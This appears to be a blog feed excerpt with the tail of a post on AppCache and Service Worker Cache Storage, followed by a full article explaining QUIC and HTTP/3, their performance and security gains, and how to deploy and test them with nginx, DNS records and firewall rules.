AppCache, short for Application Cache, was designed to enable web applications to cache resources on the user’s computer. It aimed to make web apps available offline and improve load times by storing assets like HTML files, CSS, JavaScript, and images locally.

 

The way to do that was to create a manifest file, usually named offline.appcache, which contained all the information, as shown in example 6.1.

 

Example 6.1

AppCache, create a manifest file
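The screenshot isn’t reproduced here; a minimal sketch of such a manifest, with made-up file names, might look like this (its parts are explained below):

CACHE MANIFEST
# v1.0.0

index.html
styles.css
script.js
https://cdn.example.com/library.js

NETWORK:
/api/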

The first line had to be CACHE MANIFEST and, in this case, is followed by a version number of the manifest as a comment.

 

The following lines show the files that the browser needs to cache. This could even include a remote JavaScript library, for instance.

 

Files that should never be cached need to be placed after NETWORK:, meaning they should always be retrieved from the server.

 

Example 6.2

AppCache, create a manifest file

Application Cache was enabled by adding a manifest attribute to the html tag.

Despite its initial promise, AppCache had several issues:

 

  • Files were only cached if all files in the manifest were available
  • The HTML file that has the manifest was cached as well
  • Cached files were always served from appcache; there was no way to get the files from the server instead
  • HTML updates required an updated manifest; a version number change (as in the comment mentioned before) was enough

 

For these reasons, and probably more, the Application Cache was deprecated and replaced by Cache Storage in combination with Service Workers. Some Android browsers still support AppCache, but continued use of it is not recommended.

7. Cache Storage

Cache Storage, part of the Service Workers API, is designed to store HTTP request/response pairs. It is particularly useful for enabling web applications to work offline and improving load performance.

 

Other key features that can be achieved with Cache Storage and Service Workers are:

  • Network Resilience: In situations with poor network conditions, the Cache Storage can serve as a fallback, delivering cached content when network requests fail.
  • Resource Versioning: Cache Storage supports versioning of cached assets. Developers can cache new versions of files and clear out old versions, ensuring users always have access to the latest content.
  • Custom Offline Pages: Developers can use Cache Storage to provide custom offline fallback pages. Instead of showing generic browser offline messages, applications can display branded pages, guides on using the app offline, or cached content.
  • Pre-caching: Cache Storage allows for pre-caching assets during the service worker installation. This ensures that all essential resources are cached before the user even navigates to a particular part of the site, enhancing the initial load performance.
  • API Caching: The Cache API can store responses for frequently requested data for web applications that rely heavily on API calls. This reduces the need for repetitive network requests, saves bandwidth, and improves responsiveness.

 

Caching data starts with creating, registering, and activating a Service Worker, as shown in examples 7.1 through 7.3.

 

Example. 7.1: service-worker.js

Cache Storage, part of the Service Workers API
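The screenshots for examples 7.1 through 7.3 aren’t reproduced here. A minimal sketch of a bare service-worker.js might look like this:

// service-worker.js - a sketch, not the original code
self.addEventListener("install", (event) => {
  console.log("Service Worker installing");
});

self.addEventListener("activate", (event) => {
  console.log("Service Worker activated");
});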

Example 7.2: index.html

Cache Storage, part of the Service Workers API

Example 7.3: script.js

Cache Storage, part of the Service Workers API
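A minimal sketch of the registration that script.js performs (the path to the Service Worker file is an assumption):

// script.js - a sketch, not the original code
navigator.serviceWorker.register("/service-worker.js");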

Notice that the Service Worker JavaScript file is not loaded from the HTML file but within a JavaScript file. It’s also not necessary to check if navigator.serviceWorker is available in the browser because it’s supported in all modern browsers.

 

The next step can be to have an explicit list of assets (a static cache) that need to be saved and served from the Cache Storage.

 

In example 7.4, the name of the static cache and a list of files that need to be saved to it are declared. Next, in example 7.5, the install event is extended to check if a cache already exists. If not, it will be created, and all files will be added.

Example 7.4: service-worker.js

Cache Storage, part of the Service Workers API
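A minimal sketch of example 7.4’s declarations, with a made-up cache name and file list:

// service-worker.js - a sketch, not the original code
const STATIC_CACHE = "static-v1";
const STATIC_FILES = [
  "/",
  "/index.html",
  "/styles.css",
  "/script.js",
];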

Example 7.5: service-worker.js

Cache Storage, part of the Service Workers API
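A minimal sketch of the extended install handler described above, reusing the constants from the previous sketch:

self.addEventListener("install", (event) => {
  event.waitUntil(
    caches.has(STATIC_CACHE).then((exists) => {
      if (!exists) {
        return caches
          .open(STATIC_CACHE)
          .then((cache) => cache.addAll(STATIC_FILES));
      }
    })
  );
});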

Just adding files to the cache isn’t very useful.

 

In example 7.6, the function getFromNetworkOrCache checks if the request (the full URL of the requested asset) is available in the Cache Storage. If it is, it retrieves and returns it directly.

 

If the asset is unavailable in the cache, it will fetch it from the network and serve it to the browser.

 

Example 7.6 service-worker.js

Cache Storage, part of the Service Workers API
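A minimal sketch of a getFromNetworkOrCache function as described above:

async function getFromNetworkOrCache(request) {
  const cachedResponse = await caches.match(request);
  if (cachedResponse) {
    return cachedResponse; // serve directly from the Cache Storage
  }
  return fetch(request); // otherwise fall back to the network
}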

To enable the functionality from this function, a new EventListener is added to the Service Worker file. Listening to the fetch event allows a Service Worker to catch the request and respond in any way it wants. In this case, it will respond with the result of getFromNetworkOrCache.

 

Example 7.7: service-worker.js

Cache Storage, part of the Service Workers API
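A minimal sketch of that fetch listener:

self.addEventListener("fetch", (event) => {
  event.respondWith(getFromNetworkOrCache(event.request));
});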

It’s possible to cache other files as well to go beyond the static list of files. Those dynamic files should be stored in a separate cache. In example 7.8, an extra cache name is declared, and the getFromNetworkOrCache function has been extended.

 

Example 7.8: service-worker.js

Cache Storage, part of the Service Workers API
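A minimal sketch of the extended version described below (the dynamic cache name is an assumption):

const DYNAMIC_CACHE = "dynamic-v1";

async function getFromNetworkOrCache(request) {
  const cachedResponse = await caches.match(request);
  if (cachedResponse) {
    return cachedResponse;
  }
  const networkResponse = await fetch(request);
  // Store a copy; the original response is returned to the browser
  const cache = await caches.open(DYNAMIC_CACHE);
  await cache.put(request, networkResponse.clone());
  return networkResponse;
}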

The function now saves a copy of the network response to the dynamic cache. This needs to be a copy of the response; otherwise, the Service Worker hasn’t got anything to return to the browser.

 

Next time a request with the same URL as a dynamically cached asset comes in, it can be served directly from the Cache Storage.

 

This particular cache strategy is just one of many possibilities. It can be adapted as needed. Other common scenarios in the industry are:

 

  • Cache first; if network data is newer, replace the content
  • Network first; if it fails or takes too long, serve from the cache
  • Only serve static assets from cache and API calls from the network

8. Final words

Browser Storage is very powerful and versatile, and like everything in programming, the answer to the question “What should I use?” is “It depends.” There is no silver bullet that covers all your needs in every project. All the options have their pros and cons, and you should think carefully about which one best suits your needs.

A repository with the mentioned storage possibilities is available on GitHub. It includes a client and server application you can run on your machine to try it out.

The post Exploring the Power of Web Browser Storage appeared first on International JavaScript Conference.

]]>
QUIC and HTTP/3: The Next Step in Web Performance https://javascript-conference.com/blog/quic-and-http-3-the-next-step-in-web-performance/ Tue, 30 Jul 2024 10:00:09 +0000 https://javascript-conference.com/?p=91210 I've been involved with deploying web sites for many years, and also in pentests of many sites where I see lots of misconfiguration. Throughout this journey, I've witnessed firsthand the significant impact that protocol updates can have. The introduction of HTTP/2 fundamentally altered how we approach web service delivery, prioritizing efficiency and speed. Now, HTTP/3 is poised to do the same, ushering in a new era of web performance and potentially even security.

The post QUIC and HTTP/3: The Next Step in Web Performance appeared first on International JavaScript Conference.

]]>
How did we get here?

Since the invention of the web in 1991, we’ve seen steady progress in the capabilities of the fundamental building blocks of the web: HTTP, HTML, and URLs.

  • HTTP/0.9: 1991, no RFC
    • GET only, HTML only
  • HTTP/1.0: 1996, RFC1945
    • POST and other verbs, MIME
  • HTTP/1.1: 1997, RFC2068,2616
    • Keepalive, pipelining, host header, updated in 2014
  • HTTP/2: 2015, RFC7540
    • SPDY, binary protocol, multiplexed streams
  • HTTP/3: 2022, RFC9114

What did HTTP/2 change?

Binary protocol

Switching to a binary protocol represented a major shift in HTTP’s architecture, and made several other options possible. This enhanced protocol was initially available in the form of “SPDY”, and was implemented in several browsers and servers as an experimental extension that eventually evolved into HTTP/2.

Header compression

Text-based protocols are not good for operations like compression and encryption, and the binary protocol allowed HTTP to enable compression of HTTP headers, not just the body.

Multiplexing

HTTP initially attempted to improve performance for parallel response delivery by allowing multiple TCP connections (typically defaulting to six per domain in most browsers). However, this approach also increased memory consumption and latency due to each connection requiring a full TCP and TLS handshake. This overhead is readily apparent in browser developer tools. Multiplexing, introduced in HTTP/2, addressed this by enabling the transfer of multiple resources over a single TCP connection concurrently. This marked a significant improvement over the pipelining and keepalive mechanisms of HTTP/1.1. Multiplexing allows for dynamic rescheduling of resource delivery, enabling a critical but smaller JSON response to bypass a larger, less important image download, even if it was requested later.

Server push

Server push eliminated some round trips, for example, allowing multiple image or JavaScript sub-resources to be speculatively bundled in the response to a single request for an initial HTML document. Despite the promise of this, especially for mobile applications, this approach has not seen much use.

TLS-only

Despite a great deal of push-back from corporate interests, and although HTTP/2 is technically allowed to be delivered over unencrypted connections, browser makers rejected the entire premise: all popular implementations only support HTTP/2 over HTTPS, raising the security floor for everyone.

What problems does HTTP/2 have?

Head-of-line blocking

In early HTTP, every resource transfer required setting up a new TCP connection. HTTP 1.1 added pipelining and keepalive, allowing multiple requests and responses to use the same connection, removing a chunk of overhead. This was extended in HTTP/2 multiplexing, allowing dynamic reordering and reprioritisation of those resources within the connection, but both mechanisms are subject to the same problem. If the transfer at the front of the queue is held up, all of the responses queued up on that connection will stall, a phenomenon known as head-of-line blocking.

Network switching

An individual HTTP client connection is usually identified by the combination of its IP and port number. When a client transitions between network connections, for example moving from WiFi to mobile when leaving your house, both of these will change. This necessitates a completely new TCP connection with the new values, incurring overhead in setting up a new TCP and TLS connection from scratch. In situations when connections change rapidly, for example on a high speed train where connections are handed off between cell towers, or in high-density networks, for example, in a stadium, this can result in clients continuously reconnecting, with a dramatic impact on performance.

It’s stuck with TCP

HTTP/2 is built on TCP, and as such inherits all of its shortcomings. TCP was designed 50 years ago, and while it has done remarkably well, it has problems on the modern Internet that its creators did not foresee. However, we are stuck with it, as its implementation is typically tied to the client and server operating systems that use it, so we can't change it to suit one specific networking application – in this case, HTTP.

TCP congestion control

One of the key things that can't easily be changed in TCP is the set of congestion control algorithms that kick in on busy networks. A great deal of research over the last 50 years has produced approaches to handling congestion that are superior to what's built into TCP, and our inability to deploy them has become an ironic bottleneck of its own.

What are QUIC and HTTP/3?

QUIC (originally a backronym of "Quick UDP Internet Connections", though that expansion is never used in practice) was started at Google in 2012. SPDY, which became HTTP/2, was a stepping stone to improvements in the low-level protocols that we rely on to deliver the web. Fundamentally, QUIC is a reimagining of TCP. Because we can't replace TCP in every device in the world, it needed to be built on an existing lower-level protocol that provides a functional foundation, and a great fit for that is UDP, the User Datagram Protocol. UDP is much simpler than TCP, and lacks all kinds of features such as reliable delivery, connection identification, lost packet retransmission, packet reordering, and so on. The advantage of UDP is that it's very fast and has very little overhead. UDP is most commonly used for protocols that don't mind losing a bit of data here and there – you really don't care that much about a few pixels glitching in the middle of a video call's frame, or a little click in an audio call; it's more important that the stream keeps going. It's also used for DNS, in scenarios where you don't care which DNS server responds, so long as one of them does.
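
To get a feel for how little UDP gives you, here's a minimal Node.js sketch using the built-in dgram module (the host and port are placeholders): the packet is sent and immediately forgotten – no handshake, no acknowledgement, no retransmission.

import dgram from 'node:dgram';

const socket = dgram.createSocket('udp4');

// Fire-and-forget: if this datagram is lost in transit, nothing in UDP
// will notice or resend it - that's the sender's problem, not UDP's.
socket.send(Buffer.from('hello'), 4433, 'example.com', (err) => {
  if (err) console.error('local send error:', err);
  socket.close();
});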

At this point you're probably thinking, "but we need reliable delivery for the web!". That's true, and it's why we've used TCP to date. It provides the reliability guarantees we need, along with a bunch of other features we might not even use. But we can build reliable transports on top of unreliable ones – after all, this is exactly what TCP does on top of IP. So QUIC reimplements much of what TCP does, but on a UDP base and without all of TCP's historical baggage, giving us free rein to rewrite things to better match how we want the web to work.

At the same time, Google was also looking at how encryption (specifically TLS) is used by HTTP. It’s all very ISO-network-diagram-friendly to use TLS as an independent layer, but if we look at the impact of this approach it becomes clear that TLS adds overhead in the form of latency on every request. So Google sought to integrate TLS (specifically TLS 1.3) directly into QUIC. Ultimately this allows what were previously three separate layers for TCP, TLS, and HTTP to be combined into a single layer with much lower overhead.

As terms, QUIC and HTTP/3 are often used interchangeably, and though QUIC can exist by itself, HTTP/3 can’t exist without QUIC. While QUIC can be used as a transport for other protocols (covered below), at this point it’s rare enough that it can be assumed that if you say QUIC, you also mean HTTP/3.

QUIC is a new protocol that’s not part of the OS’s standard networking stack, so it had to be implemented in “userland”, directly inside the applications that use it – browsers, HTTP clients, servers, etc. This does mean that there are multiple independent implementations, which is a recipe for more bugs and interoperability issues, but at the same time it also means that those bugs are easier to fix – application updates can be developed and rolled out much faster than those for an operating system.

If you’ve ever used mosh (mobile shell) as a remote admin tool instead of SSH, and appreciated the joys of reliable terminal sessions that never die, you’ve already experienced the advantages that a connectionless protocol built on UDP can bring, as that’s exactly what mosh does.

QUIC was eventually formalised into RFC9000, and HTTP/3 over QUIC in RFC9114.

Perhaps QUIC’s biggest secret is that you’re using it already. QUIC was implemented in most browsers in 2022, and CloudFlare reported that HTTP/3 use overtook HTTP/1.1 in that same year.

Head-of-line blocking (HOLB)

I mentioned HOLB earlier. This occurs in HTTP/2 because while we implemented multiplexing within a single TCP channel, and we can reorder and reprioritise the transfers that are occurring within it, it’s still subject to TCP’s own limitations because TCP knows nothing about HTTP. QUIC allows us to do away with that. UDP’s connectionless approach lets every transfer proceed independently; holding up one transfer has no effect on the others.

fig1: Head-of-line blocking

Network layers

The ISO 7-layer model has had much criticism because there are so many exceptions to its academic, isolated approach; HTTP/3 blurs the boundaries even more, for considerable gain.

In HTTP/1.1 we had 2 or 3 layers depending on whether we added TLS into the mix. HTTP/2 clarified that by enforcing a TLS layer. HTTP/3 mixes it all up again by dropping TCP in favour of UDP and combining the TLS and HTTP layers.

fig2: Network Layers

All-round improvements

Let's look at the overhead in creating a new connection across the three most common stacks: HTTP/2 with TLS 1.2, HTTP/2 with TLS 1.3, and HTTP/3 over QUIC.

With TLS 1.2, the first request requires no fewer than four network round trips between client and server before the first HTTP response is delivered: one for TCP's SYN/ACK handshake, two for TLS key exchange and session start, and finally the HTTP request itself. TLS 1.3 improved on this by combining its two round trips into one, saving 25%. HTTP/3 saves an additional trip by folding the equivalent of the TCP handshake (which no longer exists as a separate step in QUIC) into the TLS setup, followed by the HTTP request, giving a 50% improvement over HTTP/2 with TLS 1.2.
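
Counting the round trips before the first response arrives:

HTTP/2 + TLS 1.2:  1 (TCP handshake) + 2 (TLS 1.2 setup) + 1 (HTTP request) = 4
HTTP/2 + TLS 1.3:  1 (TCP handshake) + 1 (TLS 1.3 setup) + 1 (HTTP request) = 3
HTTP/3 over QUIC:  1 (combined QUIC + TLS 1.3 setup)     + 1 (HTTP request) = 2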

fig3: Initial connections

 

When a client makes subsequent requests to the same server, we can save some effort – we already know what TLS configuration to use, so no key exchange or cipher negotiation is needed. This allows a resumed connection with HTTP/2 over TLS 1.3 to take only two network round trips. HTTP/3 goes further, combining transport setup, TLS resumption, and the HTTP request into a single round trip, halving the latency. When TLS 1.3 was announced back in 2016, this was touted as "0-RTT", which was definitely an improvement, but it ignored the fact that TCP's handshake overhead was still there. HTTP/3 delivers it for real.
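
Counting the round trips again for resumed connections:

HTTP/2 + TLS 1.3 (resumed):  1 (TCP handshake) + 1 (TLS resumption + HTTP request) = 2
HTTP/3 over QUIC (resumed):  1 (QUIC + TLS resumption + HTTP request)              = 1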

fig4: Resumed connections

Network switching

I mentioned earlier that TCP connections are identified by the combination of the client's IP address and port number, which means connections must be re-established when either changes. QUIC avoids this by not identifying connections that way; instead it assigns a connection identifier (a random number) during the initial connection, and all subsequent requests can use that identifier regardless of which network they arrive from. A major advantage is that resumed connections become much more likely, as the connection does not need to be reset every time we switch networks – great news on busy or slow networks.

That sounds cool, but also like a bit of a privacy problem, as it means that you can be traced as you move between networks. Fortunately, this is something QUIC’s designers thought about. Instead of assigning you a single, static identifier on the initial connection, you’re assigned a pool of random values, and each time you switch networks the next value is used, so the server and client know you are the same user, but the networks in between do not. Clever, huh?

Header compression

When HTTP/2 introduced its binary protocol, it was able to add compression of HTTP headers, which were uncompressed in previous HTTP incarnations. In these days of chunky JWTs and Content-Security-Policy HTTP headers, this can represent a fair saving in the data required to transfer them.

Unfortunately, HTTP/2's HPACK compression depends on reliable, in-order delivery of the underlying data, so a compressed chunk has to be received in its entirety before it can be decompressed – really another form of HOLB. HTTP/3 switches to a compression scheme called QPACK, which is slightly less efficient but avoids this congestion problem.

Security upgrade

While TLS 1.3 has been available as an option for a long time – my first conference talk on TLS 1.3 was in 2016 – QUIC makes it a requirement. Because QUIC is completely integrated with TLS, more of the data is encrypted – the only things left unencrypted are the connection IDs, which are just random numbers anyway.

TLS 1.3 brings a bunch of security improvements over 1.2:

  • Lower overhead, as we’ve seen
  • No weak cipher suites, key-exchange algorithms, MACs, or hash functions
  • Perfect forward secrecy in all cipher suites
  • Downgrade detection

HTTP/3 is even safer than HTTP/2 + TLS 1.3 because more of the connection is encrypted – encryption kicks in earlier in the process, and QUIC encrypts its own transport headers, something even TLS 1.3 over TCP does not do.

All that said, HTTP/3 shares the same problem with resumed connections that HTTP/2 does: it is not especially well defended against replay attacks. For this reason, resumed (0-RTT) connections should only be used for idempotent requests that do not change server state, which in practice means GET requests only.

HTTP/3 implementations

HTTP/3 is harder to implement than HTTP/2 because every application has to implement the entire underlying QUIC protocol as well, at both ends of the connection. Fortunately, this speed bump is now largely in the past, as HTTP/3 has been implemented in the majority of places where it's needed.

Unsurprisingly, the first HTTP/3 client was Chrome, followed by the Chromium-based browsers that inherit from it, such as Microsoft Edge, and soon after by Firefox and Safari (including on iOS 15).

Servers were quick to follow, with Litespeed taking the chequered flag, followed by Caddy, Nginx, IIS (in Windows Server 2022), and HAProxy. The one straggler yet to make the finish line is Apache, but I’m sure it will get there soon. Libraries are vitally important for many implementations, saving a lot of development effort, and h2o, nghttp3, libcurl, and OpenSSL now all have HTTP/3 support.

Several cloud services, most notably CloudFlare, have updated their front-ends to support HTTP/3, so if you’re using that, it’s likely you have HTTP/3 support without even noticing!

Remember that all of these are “userland” implementations, and so are not subject to OS stagnation; so long as the OS supports UDP (and they all do), we’re good to go.

Deploying HTTP/3

We do have a slight chicken & egg problem: How does a client know that it can use HTTP/3? If the client just tries to use it, the server might not support it, and so we will be stuck there waiting for it to time out before we can fall back to HTTP/2 or further. This isn’t really acceptable, so we need to approach it from the other direction, providing hints to the client that they can upgrade their connection to HTTP/3 after they have connected by HTTP/2. This works much as we handle unencrypted HTTP – clients connect to the unsecured endpoint, and are then redirected to the secure one.

There are two key mechanisms available to do this. The Alt-Svc HTTP header, and the SVCB DNS record type.

The Alt-Svc ("Alternative Service") HTTP header is defined in RFC7838 and works in a similar way to Strict-Transport-Security (HSTS) for HTTPS. A typical header might look like this:

Alt-Svc: h3=":443"; ma=3600, h2=":443"; ma=3600

This tells the client that the service it's connecting to is also available over HTTP/3 on UDP port 443 and over HTTP/2 on TCP port 443, in that order of preference. In both cases the client is also told that these services will be available for at least the next 3600 seconds (one hour). Once the browser has seen this header, it can set about switching to the faster protocol.
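
If your application is fronted by a proxy or CDN that terminates HTTP/3 for you, you can emit the same hint from application code. Here's a minimal Node.js sketch using the built-in http2 module – the certificate paths are placeholders, and it assumes something is actually answering QUIC on UDP port 443:

import { createSecureServer } from 'node:http2';
import { readFileSync } from 'node:fs';

const server = createSecureServer({
  key: readFileSync('./certs/privkey.pem'),   // placeholder paths
  cert: readFileSync('./certs/fullchain.pem'),
  allowHTTP1: true,
});

server.on('request', (req, res) => {
  // Hint that this origin is also reachable over HTTP/3 on UDP 443 for the next hour.
  res.setHeader('Alt-Svc', 'h3=":443"; ma=3600');
  res.end('hello\n');
});

server.listen(443);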

The SVCB (“Service Binding”) DNS record type is defined in RFC9460, and looks like this:

example.com 3600 IN HTTPS 1 . alpn="h3,h2"

This tells a client that the example.com domain offers an HTTPS service over HTTP/2 and HTTP/3 for at least the next hour. There is a bit of a silly issue here: we could have found out the same thing from an Alt-Svc header just by going straight to the service, so we have merely swapped an HTTP request for a DNS lookup, both of which have about the same network overhead. Worse, we need a DNS lookup anyway to discover the IP address to connect to, so this looks like extra work on top. Fortunately, the SVCB record's authors thought of this too, and the response can include IP address hints, like this:

example.com 3600 IN HTTPS 1 . alpn="h3,h2" ipv4hint="192.0.2.1" ipv6hint="2001:db8::1"

This gives us both the information about the service availability and the IP addresses that we need to connect to; two birds, one stone.
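
To see what a domain actually publishes, you can query the HTTPS record yourself. A reasonably recent dig (BIND 9.16 or later) understands the record type by name; older builds need the raw TYPE65 form:

dig +short example.com HTTPS
dig +short example.com TYPE65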

SVCB has another trick up its sleeve: you can provide multiple records with different priorities and abilities:

example.com 3600 IN HTTPS 1 example.net alpn="h3,h2"
example.com 3600 IN HTTPS 2 example.org alpn="h2"

This says that the example.com service is available at example.net over both HTTP/2 and HTTP/3, and is also available as a fallback (a higher priority value meaning a lower priority) over HTTP/2 only at example.org.

Nginx config example

I have to say that Caddy is the easiest server to configure for HTTP/3, because it's enabled by default – its integrated automatic certificate setup means you don't have to do anything extra (see the sketch below). However, nginx is extremely popular, so the rest of this section shows how to make it work there.
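
For comparison, this is roughly all a Caddyfile needs – a sketch assuming Caddy v2.6 or later (where HTTP/3 is enabled by default) and a domain that already resolves to this machine so certificates can be issued automatically:

example.com {
  root * /var/www/html
  file_server
}

Now for the nginx version.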

server {
  listen 443 ssl;
  listen [::]:443 ssl;
  listen 443 quic;
  listen [::]:443 quic;
  http2 on;
  add_header Alt-Svc 'h3=":443"; ma=86400';
  server_name example.com www.example.com;
  # ... certificate locations, root, logging, and any other directives go here ...
}

The first two lines will be familiar territory for nginx users – they haven't changed at all, though nginx moved the http2 switch from the listen directive to its own directive in version 1.25.1 in 2023.

We then add two lines creating listeners for QUIC on IPv4 and IPv6, on the same interfaces and port number as for HTTP/2 – there is no clash because they use UDP instead of TCP.

You can find the nginx QUIC docs at nginx.org/en/docs/quic.html.

We then add an Alt-Svc header indicating that we recommend moving to HTTP/3 and that it will be available for at least the next day. We don't need to state that we also offer HTTP/2, because it's implicit – if we didn't, the client would never have received this header in the first place.

After this we carry on with all the other nginx config directives we might need – the server name, root directory, certificate locations, additional headers, logging config, etc. Remember that HTTP/3 requires TLSv1.3.

You also need to allow inbound traffic to UDP port 443 in your firewall and possibly in your cloud provider’s security groups too. In ufw on Debian and derivatives, you’d add it like this:

ufw allow proto udp from any to any port 443

In the next major releases of the Debian and Ubuntu packages later in 2024, you’ll also find support for an nginx ufw application (thanks to a PR by yours truly) that allows you to write this in a slightly prettier way, supporting all of HTTP/1, 2, and 3 in one line:

ufw allow from any to any app "Nginx QUIC"

Optimising for HTTP/3

Despite all the underlying changes, HTTP/3 remains unchanged with respect to HTTP semantics, so when it comes to optimisation it’s also the same as for HTTP/2. The short version:

  • Use few domains for loading content (reducing the number of DNS lookups and connection setups)
  • Don’t worry about bundling; request count doesn’t really matter any more, and larger numbers of small requests are easier for the browser to cache and manage. Think of webpack as an antipattern!
  • Make use of defer, async, and preload for lazy-loading resources, letting the browser schedule them most efficiently (see the snippet below).
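
For example, a generic sketch (the file names are placeholders):

<link rel="preload" href="/fonts/main.woff2" as="font" type="font/woff2" crossorigin>
<script src="/js/app.js" defer></script>
<script src="/js/analytics.js" async></script>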

Testing HTTP/3

Testing HTTP/3 is slightly tricky. Until it sees the Alt-Svc header, a client doesn’t know it can use HTTP/3, so the very first request will be HTTP/2 (unless it’s done an SVCB lookup).

That status will persist for the max-age (ma) of the Alt-Svc header, so you want to keep that very short while testing. One trick I learned when playing with this is that browsers forget the max-age value in incognito/private browsing windows, so use one of those if you want to watch the HTTP/2-to-HTTP/3 handoff repeatedly.

The first request will always be over HTTP/2, but you can't predict exactly when the browser will switch to HTTP/3 for sub-requests. Browsers optimise very aggressively, so after seeing the Alt-Svc header, the browser may issue sub-resource requests simultaneously over both HTTP/2 and HTTP/3 for the same resource as a way of measuring which provides the best performance, and then use that result for subsequent requests.

If you open the network tab in Chrome's developer tools, right-click on the request table's header and enable "Protocol", you'll see a column showing which protocol the browser used for each request. You should expect to see h2 for the first request, then further h2 requests for sub-resources, but at some point you'll see it switch to h3. You might expect a reload to result in h3 for everything; however, you may find that Chrome classes anything delivered from its local cache as h2, even though it never actually hit the network. Disabling the cache should let you see everything switch to h3 on reload. If you roll your mouse over a value in the protocol column, it will tell you why that protocol was selected, which is very useful for diagnosing connections that don't seem to make the switch (e.g. if your browser finds that your site's HTTP/3 responses are slower than HTTP/2, it won't use them).

fig5: Dev tools view showing protocol column

There is a handy testing service at http3check.net that will confirm that your site is delivered over HTTP/3. There is a Chrome extension called HTTP Indicator that displays a little lightning bolt icon in your toolbar – blue for HTTP/2, orange for HTTP/3.
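
Another quick check is curl, provided your build has HTTP/3 compiled in – run curl -V and look for HTTP3 in the features list. Assuming it's there, something like this should print an HTTP/3 status line:

curl --http3 -sI https://example.com | head -n 1

Note that --http3 still allows curl to fall back to older protocol versions; newer builds also offer --http3-only if you'd rather the request fail than fall back.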

Crunch time: Is it actually faster?

Unfortunately, the answer here is "it depends". As you've seen, it can be difficult to measure, but the biggest payoff will be in situations where HTTP/3's features make a difference, which will be when you have any combination of:

  • Low bandwidth
  • High congestion
  • High latency
  • Frequent network switching

So if you're testing this on your company's fast fibre connection or good domestic broadband, you won't see (or measure) any practical difference. But if you're up a mountain on the other side of the world, with a weak signal, switching between roaming services during a major sporting event, it's much more likely to help.

In 2022, Google reported a 14% speed improvement for the slowest 10% of users. Fastly/Wix reported an 18-33% improvement in time to first byte for HTTP/3.

This is really HTTP/3’s payoff – it raises the performance floor for everyone; those with the worst connections are the ones that will benefit most.

HTTP/3 problems

Not everything is rosy in the HTTP/3 garden; there are new opportunities for things to go astray. Networks might block UDP. There is latency in version discovery. It's new, so it will have more bugs. And the fact that more is encrypted is a double-edged sword: the increased protection makes low-level network analysis and troubleshooting more difficult, and makes it much less friendly to corporate monitoring.

The future of QUIC

QUIC was designed with a deliberately dynamic specification. Soon after the original 1.0 release, version 2 was published as RFC9369. It was essentially unchanged, but it forced implementors to cope with version number changes, to prevent the stagnation and "ossification" that MIME 1.0 experienced. Ossification is especially prevalent in "middleboxes" that provide things like WAFs and mail filtering.

QUIC features pluggable congestion control algorithms, so we are likely to see QUIC implementations tuned for mobile, satellite, low-power, or very long distance networks that have different usage and traffic profiles to broadband.

Though QUIC and HTTP/3 are very closely tied, it’s possible for other protocols to take advantage of QUIC’s approach, and there have already been implementations of SSH over QUIC and a proposed standard for DNS over QUIC.

What are you waiting for?

Go configure HTTP/3 on your servers now!


The post QUIC and HTTP/3: The Next Step in Web Performance appeared first on International JavaScript Conference.
